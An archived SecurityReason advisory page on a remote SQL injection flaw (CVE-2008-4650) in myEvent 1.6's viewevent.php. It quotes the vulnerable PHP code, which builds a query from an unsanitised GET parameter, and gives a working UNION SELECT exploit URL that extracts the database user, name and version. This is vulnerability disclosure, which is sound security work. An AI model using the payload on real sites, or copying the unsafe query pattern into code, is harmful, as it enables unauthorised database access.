|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 4457 CVE : CVE-2008-4650 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes
Credit : JosS Published : 22.10.2008
Advisory Content : # myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability # url: http://mywebland.com/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Greetz To: All Hackers and milw0rm website vuln file: /viewevent.php vuln code: 43: if (isset($_GET['eventdate'])) xx: ... 93: $sql = "SELECT * FROM event WHERE date = '$eventdate'" ; 94: $results = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); 95: $event = mysql_num_rows($results); PoC: /viewevent.php?eventdate='[foo] Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),d atabase(),char(32,35),version())/* References : http://securityreason.com/expldownload/1/4923/1 (Exploit) http://www.securityfocus.com/bid/31773
http://www.milw0rm.com/exploits/6760  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |